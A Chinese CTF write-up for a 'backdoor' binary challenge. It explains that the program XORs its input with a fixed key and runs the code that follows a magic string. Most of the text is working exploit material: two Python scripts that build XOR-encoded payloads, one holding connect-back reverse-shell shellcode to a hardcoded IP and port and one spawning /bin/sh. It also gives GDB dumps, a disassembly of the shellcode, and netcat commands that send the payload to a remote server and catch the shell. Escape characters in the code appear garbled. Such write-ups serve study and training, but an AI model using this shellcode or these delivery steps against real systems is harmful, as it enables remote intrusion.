后门程序: 100
描述
题目放出很久才写,哎················
程序 流程为 输入 字符串 然后与 <baidu-rocks,froM-china-with-love> 异或 与 n0b4ckd00 相等 那么直接执行 str+0xa后面的 代码
首先 这个程序 0xb 无法被 scanf 读入 导致后面的数据被截断
在EDB中查看:
缺点是 无法 加入 参数 所以一般都不用·····················
在GDB 中 可以加入 参数 并且可以下断 调试 查看堆栈等
PYHTON POC1:
shellcode 用 http://shell-storm.org/shellcode/files/shellcode-849.php (后面用一个更简单的)
from itertools import izip, cycle
# izip('ABCD', 'xy') --> Ax By
# cycle('ABCD') --> A B C D A B C D A B C D ...
#ipaddr 10.16.2.28
#port 31337 (7a69)
#ipaddr='x10x10x02x1c'
#port = '7ax69'
shellcode = (
'x31xc0x31xdbx31xc9x31xd2'
'xb0x66xb3x01x51x6ax06x6a'
'x01x6ax02x89xe1xcdx80x89'
'xc6xb0x66x31xdbxb3x02x68'
#ipaddr
'x0ax10x02x1c'
'x66x68'
#port
'x7ax69'
'x66x53xfe'
'xc3x89xe1'
'x6ax10x51x56x89'
'xe1xcdx80x31xc9xb1x03xfe'
'xc9xb0x3fxcdx80x75xf8x31'
'xc0x52x68x6ex2fx73x68'
'x68'
'x2fx2fx62x69x89xe3x52x53'
'x89xe1x52x89xe2xb0x0bxcd'
'x80')
bd = '<baidu-rocks,froM-china-with-love>'
data = 'n0b4ckd00r' + shellcode + '
'
xordata =''
for i in range(len(data)):
xordata += chr( ord( bd[i%len(bd)] ) ^ ord(data[i]) )
open('payload.txt','wb').write(xordata)
import binascii
print repr(binascii.hexlify(xordata))x0b
GDB 命令学习:
* info frame :显示当前栈帧的详细信息。
如要查看所有的gdb命令,可以在gdb下键入两次Tab(制表符)
xbreak 在当前函数的退出的点上设置一个断点
step 跟入函数
next 不跟入函数
bt Backtrace: 显示程序堆栈信息(gdb) x/20i $eip 查看EIP => 0x8048c00: push %ebx 0x8048c01: sub $0x28,%esp 0x8048c04: mov %gs:0x14,%eax 0x8048c0a: mov %eax,0x1c(%esp) 0x8048c0e: xor %eax,%eax 0x8048c10: lea 0x13(%esp),%edx 0x8048c14: lea 0x1b(%esp),%eax 0x8048c18: movb $0x0,(%eax)
Examine memory: x/FMT ADDRESS. ADDRESS is an expression for the memory address to examine. FMT is a repeat count followed by a format letter and a size letter. Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal), t(binary), f(float), a(address), i(instruction), c(char) and s(string). Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
GDB 中 对 0x08048e10 下断:
(gdb) file backdoor_844d899c6320ac74a471e3c0db5e902e
(gdb) r < payload.txt
break *0x08048e10
(gdb) x/200bx *(int*)($ebp+8)
0xbffff2a8: 0x52 0x52 0x03 0x5d 0x07 0x1e 0x49 0x42
0xbffff2b0: 0x5f 0x11 0x5a 0xb3 0x1d 0xbd 0x43 0xa6
0xbffff2b8: 0x7c 0xff 0xd3 0x0e 0xda 0x6f 0x30 0x47
0xbffff2c0: 0x71 0x03 0x75 0x02 0x2f 0xe5 0x8e 0xbb
0xbffff2c8: 0xe5 0xb7 0xfa 0xd2 0x07 0x58 0xbf 0xc6
0xbffff2d0: 0x2f 0x1a 0x7f 0x73 0x69 0x6f 0x4a 0x0e
0xbffff2d8: 0x08 0x06 0x2b 0x7e 0x9d 0xab 0xe0 0x8f
0xbffff2e0: 0x00 0x10 0xff 0xb7 0xc0 0x8a 0x04 0x08
0xbffff2e8: 0x01 0x00 0x00 0x00 0xa2 0x8f 0x04 0x08
0xbffff2f0: 0x01 0x00 0x00 0x00 0xc4 0xf3 0xff 0xbf
0xbffff2f8: 0xcc 0xf3 0xff 0xbf 0x18 0xf3 0xff 0xbf
0xbffff300: 0xa5 0xc4 0xd8 0xb7 0x30 0x10 0xff 0xb7
0xbffff308: 0x5b 0x8f 0x04 0x08 0x01 0x00 0x00 0x00
0xbffff310: 0x50 0x8f 0x04 0x08 0x00 0x00 0x00 0x00
0xbffff318: 0x98 0xf3 0xff 0xbf 0xd6 0x3b 0xd7 0xb7
0xbffff320: 0x01 0x00 0x00 0x00 0xc4 0xf3 0xff 0xbf
0xbffff328: 0xcc 0xf3 0xff 0xbf 0x00 0x70 0xeb 0xb7
0xbffff330: 0x80 0xf3 0xff 0xbf 0xff 0xff 0xff 0xff
0xbffff338: 0xf4 0xef 0xff 0xb7 0xf4 0x86 0x04 0x08
0xbffff340: 0x01 0x00 0x00 0x00 0x80 0xf3 0xff 0xbf
0xbffff348: 0x26 0x06 0xff 0xb7 0xb0 0xfa 0xff 0xb7
0xbffff350: 0x48 0x76 0xeb 0xb7 0xf4 0x2f 0xeb 0xb7
0xbffff358: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff360: 0x98 0xf3 0xff 0xbf 0x18 0x79 0x46 0xa0
0xbffff368: 0x08 0x0f 0xd7 0xf1 0x00 0x00 0x00 0x00
可以看到 堆栈被破坏了 构造的shellcode不能运行
接着我们 在适合的地方+ ‘x90’
shellcode 结构如下:
8048060: 31 c0 xor eax,eax 8048062: 31 db xor ebx,ebx 8048064: 31 c9 xor ecx,ecx 8048066: 31 d2 xor edx,edx 8048068: b0 66 mov al,0x66 804806a: b3 01 mov bl,0x1 804806c: 51 push ecx 804806d: 6a 06 push 0x6 804806f: 6a 01 push 0x1 8048071: 6a 02 push 0x2 8048073: 89 e1 mov ecx,esp 8048075: cd 80 int 0x80 8048077: 89 c6 mov esi,eax 8048079: b0 66 mov al,0x66 804807b: 31 db xor ebx,ebx 804807d: b3 02 mov bl,0x2 804807f: 68 c0 a8 01 0a push 0xa01a8c0 8048084: 66 68 7a 69 pushw 0x697a 8048088: 66 53 push bx 804808a: fe c3 inc bl 804808c: 89 e1 mov ecx,esp 804808e: 6a 10 push 0x10 8048090: 51 push ecx 8048091: 56 push esi 8048092: 89 e1 mov ecx,esp 8048094: cd 80 int 0x80 8048096: 31 c9 xor ecx,ecx 8048098: b1 03 mov cl,0x3 0804809a <dupfd>: 804809a: fe c9 dec cl 804809c: b0 3f mov al,0x3f 804809e: cd 80 int 0x80 80480a0: 75 f8 jne 804809a 80480a2: 31 c0 xor eax,eax 80480a4: 52 push edx 80480a5: 68 6e 2f 73 68 push 0x68732f6e 80480aa: 68 2f 2f 62 69 push 0x69622f2f 80480af: 89 e3 mov ebx,esp 80480b1: 52 push edx 80480b2: 53 push ebx 80480b3: 89 e1 mov ecx,esp 80480b5: 52 push edx 80480b6: 89 e2 mov edx,esp 80480b8: b0 0b mov al,0xb 80480ba: cd 80 int 0x80下面在合适的地方增加 'x90'
``````````````````````````` 'x66x53xfe' 'xc3x89xe1' +'x90'////// 'x6ax10x51x56x89' 'xe1xcdx80x31xc9xb1x03xfe' 'xc9xb0x3fxcdx80x75xf8x31' 'xc0x52x68x6ex2fx73x68' + 'x90x90x90'//////// ```````````````````````````gdb调试可以看到 scanf 全部输入了
接下来:
nc 218.2.197.250 1337 < payload.txt
nc -lvp 31337
即可获得shell cat /home/ctf/flag
PYHTON POC2:
'''
00401120 > 90 nop
00401121 90 nop
00401122 90 nop
00401123 31C0 xor eax,eax
00401125 50 push eax
00401126 68 2F2F7368 push 0x68732F2F
0040112B 68 2F62696E push 0x6E69622F
00401130 89E3 mov ebx,esp
00401132 50 push eax
00401133 53 push ebx
00401134 89E1 mov ecx,esp
00401136 B0 0B mov al,0xB
00401138 CD 80 int 0x80
'''
shellcode = (
"x90x90x90x31xC0x50x68x2Fx2F"
"x73x68x68x2Fx62x69x6Ex89xE3"
"x50x53x89xE1xB0x0BxCDx80")
bd = '<baidu-rocks,froM-china-with-love>'
data = 'n0b4ckd00r' + shellcode + '
'
xordata =''
for i in range(len(data)):
xordata += chr( ord( bd[i%len(bd)] ) ^ ord(data[i]) )
open('payload.txt','wb').write(xordata)
import binascii
print repr(binascii.hexlify(xordata))